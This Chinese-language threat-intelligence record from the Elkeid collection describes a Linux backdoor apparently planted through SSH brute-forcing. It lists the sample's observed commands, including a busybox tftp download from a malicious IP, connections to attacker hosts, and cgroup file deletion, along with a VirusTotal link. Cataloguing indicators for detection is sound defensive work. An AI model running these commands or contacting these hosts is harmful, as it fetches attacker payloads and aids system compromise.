简述
该样本行为特征中,存在访问恶意IP,文件删除等行为,推测为通过ssh爆破进入的后门样本
样本类型
后门,控制
elkeid 样本ID
elkeid_20220609_backdoor_2
捕获时间
- 20220609
最近活跃时间
- 20221115
已知入侵途径
- ssh爆破
涉及样本
- 无样本
主要行为
- 重命名基本命令
/bin/busybox cp /bin/echo yy
-
访问恶意IP
/tmp/yy a49.142.208.62:26987 a49.142.208.20:26987 a49.142.208.20:26987 a49.142.208.20:26987 a49.142.208.20:26987 a49.142.208.20:26987 a49.142.208.20:26987 a49.142.208.20:26987 k22 -
文件下载
/bin/busybox tftp -g -l - -r yCz31g9 49.142.208.62
- 文件删除
/bin/busybox rm /sys/fs/cgroup/unified/.none
/bin/busybox rm /sys/fs/cgroup/systemd/.none
IOC
参考链接
https://www.virustotal.com/gui/url/ec3b9e28d04437baec43a74b3d05f1b31639544a9ef98e19ecfb369d7a1e33e4/detection